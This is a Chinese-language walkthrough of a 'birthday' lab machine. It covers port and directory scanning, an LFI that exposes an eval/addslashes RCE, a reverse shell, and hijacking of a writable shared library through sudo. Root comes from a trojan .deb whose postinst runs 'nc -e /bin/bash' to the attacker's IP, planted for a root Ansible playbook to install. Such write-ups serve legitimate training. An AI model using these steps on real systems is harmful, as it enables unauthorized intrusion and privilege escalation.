难度:Hard
kali:192.168.56.104
靶机:192.168.56.149
信息收集
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 10:39 CST
Nmap scan report for 192.168.56.149
Host is up (0.00016s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E8:95:BE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds好消息端口不是很复杂 只有22 80两个端口
目录扫描
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.149 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,html,txt,php,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/server-status (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================查看web
源码没什么东西,只有一张图片,进行隐写分析后发现并没有什么隐写,唯一利用点只剩url了
乱试一通,发现把data改成birthday就跳转到了birthday_party_program.php
每个都点一下试试,发现有一个可能FLI
然后下面点击here的时候还会跳转到一个计算生日的url 
猜测可以命令执行,就用LFI读一下文件源码
RCE
http://192.168.56.149/birthday_party_program.php?page=/var/www/html/birthday_calculator.php
<?php
if (isset($_GET['dob'])) {
$dob = addslashes($_GET['dob']);
eval("\$dob = \"$dob\";");
$now = new DateTime();
$nextBirthday = new DateTime($dob);
$nextBirthday->setDate($now->format('Y'), $nextBirthday->format('m'), $nextBirthday->format('d'));
if($nextBirthday < $now) {
$nextBirthday->modify('+1 year');
}
$interval = $now->diff($nextBirthday);
echo "<p>Your next birthday is in: ".$interval->days." days!</p>";
}
?>搜索到一篇关于addslashes绕过的文章
使用复杂变量绕过addslashes函数实现RCE_eval(‘$str=”‘.addslashes($str).’”;’ );-CSDN博客
反弹shell
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 50338
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@birthday:/var/www/html$ 提权user
sudo -l
home下只有一个用户chloe但是无权进入,不过sudo -l可以提升权限
www-data@birthday:/var/www$ cd /home
cd /home
www-data@birthday:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 28 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwx------ 4 chloe chloe 4096 Jul 14 2023 chloe
www-data@birthday:/home$ cd chloe
cd chloe
bash: cd: chloe: Permission denied
www-data@birthday:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiacwww-data@birthday:/home$ zodiac
zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
Your Zodiac sign is: Capricorn是一个计算星座点击脚本,看一下权限
www-data@birthday:/usr/bin$ ls -al ./zodiac
ls -al ./zodiac
-rwxr-xr-x 1 root root 16056 Jun 29 2023 ./zodiac不能修改,那只能从动态链接库下手了
动态链接库劫持
www-data@birthday:/usr/bin$ ldd ./zodiac
ldd ./zodiac
linux-vdso.so.1 (0x00007ffed7d85000)
libzodiac.so => /lib/x86_64-linux-gnu/libzodiac.so (0x00007f8d26467000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8d26286000)
/lib64/ld-linux-x86-64.so.2 (0x00007f8d26477000)能下手的只有libzodiac.so,看一下权限
www-data@birthday:/usr/bin$ ls -al /lib/x86_64-linux-gnu/libzodiac.so
ls -al /lib/x86_64-linux-gnu/libzodiac.so
-rwxr-xrwx 1 root root 15096 Jul 6 2022 /lib/x86_64-linux-gnu/libzodiac.so可以修改
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int main(){
system("/bin/bash");
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
/usr/bin/zodiac: symbol lookup error: /usr/bin/zodiac: undefined symbol: get_zodiac_sign写个简单的c发现报错,需要get_zodiac_sign这个函数,那就修改一下exp
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int get_zodiac_sign()
{
system("/bin/bash");
}
int main(){
get_zodiac_sign();
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
chloe@birthday:/tmp$ id
id
uid=1001(chloe) gid=1001(chloe) groups=1001(chloe)
chloe@birthday:/tmp$ 成功拿到chloe的权限
提权root
在opt目录下发现一个脚本,并且所属root
chloe@birthday:/opt$ ls -al
ls -al
total 16
drwxr-xr-x+ 3 root root 4096 Jul 14 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwxr-xrwx 2 root root 4096 Jul 2 2023 packages
-rwxr-xr-x 1 root root 357 Jul 2 2023 script.sh
chloe@birthday:/opt$ cat script.sh
cat script.sh
#!/bin/bash
URL="http://ipv4.download.thinkbroadband.com/50MB.zip"
FILE="50MB.zip"
if [ -f "$FILE" ]; then
rm "$FILE"
fi
START=$(date +%s.%N)
wget -O $FILE $URL
END=$(date +%s.%N)
DIFF=$(echo "$END - $START" | bc)
SIZE=$(du -b $FILE | cut -f1)
SPEED=$(echo "scale=2; ($SIZE*8/1000000)/$DIFF" | bc)
echo "Download speed : $SPEED Mbps"
rm "$FILE"计算从指定url下载文件所用的时间
用pspy64分析一下
发现/usr/bin/ansible-playbook /etc/ansible/install.yml 会被定时执行2024/04/06 05:41:09 CMD: UID=0 PID=25666 | /usr/bin/python3 /usr/bin/ansible-playbook /etc/ansible/install.yml
chloe@birthday:~$ ls -al /etc/ansible/install.yml
ls -al /etc/ansible/install.yml
-rw-r--r-- 1 root root 1174 Jul 13 2023 /etc/ansible/install.yml
chloe@birthday:~$ cat /etc/ansible/install.yml
cat /etc/ansible/install.yml
- hosts: clients
tasks:
- name: Run script /opt/script.sh
ansible.builtin.command: /opt/script.sh
- name: Install debian packages
ansible.builtin.apt:
deb: "/opt/packages/{{ item }}"
loop:
- abigail-doc_2.2-2_all.deb
- airspy_1.0.10-2+b1_amd64.deb
- aobook_1.0.3-3_amd64.deb
- auto-07p_0.9.2+dfsg-3+b3_amd64.deb
- bacula-console_9.6.7-7_amd64.deb
- name: Copy /var/www/html to /var/backup/site.zip
ansible.builtin.archive:
path: /var/www/html
dest: /var/backup/site.zip
- name: Check who is connected
ansible.builtin.shell: who > /tmp/who.txt
- name: Add entry in /etc/hosts
ansible.builtin.lineinfile:
path: /etc/hosts
line: "127.0.0.1 localhost.me"
- name: Install apt package
ansible.builtin.apt:
name: htop
state: present
- name: Install netdata
ansible.builtin.apt:
name: netdata
state: present
- name: Run netdata service
ansible.builtin.systemd:
name: netdata
enabled: yes
state: started这是个YAML 格式的 Ansible Playbook 文件
1.执行/opt/script.sh这个脚本
2.安装/opt/packages/下面的debian包
3.将/var/www/html打包成/var/backup/site.zip
4.执行who的指令,将结果输出到/tmp/who.txt
5.在/etc/hosts中将127.0.0.1映射到localhost.me
6.安装htop,netdata,启用netdata服务
利用方式是创建一个可以反弹shell的debian包
这一块我不会直接看wp了
chloe@birthday:/dev/shm$ mkdir deb
chloe@birthday:/dev/shm$ cd deb
chloe@birthday:/dev/shm/deb$ mkdir -p package/DEBIAN
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/postinst
nc -e /bin/bash 192.168.56.104 4444
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/control
Package: revshell
Version: 1.0
Architecture: all
Description: revshell
Maintainer: crom
chloe@birthday:/dev/shm/deb$ chmod +x package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ dpkg-deb --build package
chloe@birthday:/dev/shm/deb$ mv package.deb /opt/packages/aobook_1.0.3-3_amd64.deb
replace '/opt/packages/aobook_1.0.3-3_amd64.deb', overriding mode 0644 (rw-r--r--)? y
kali开个监听就能拿到root
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 51688
uid=0(root) gid=0(root) groups=0(root)
cat /root/r*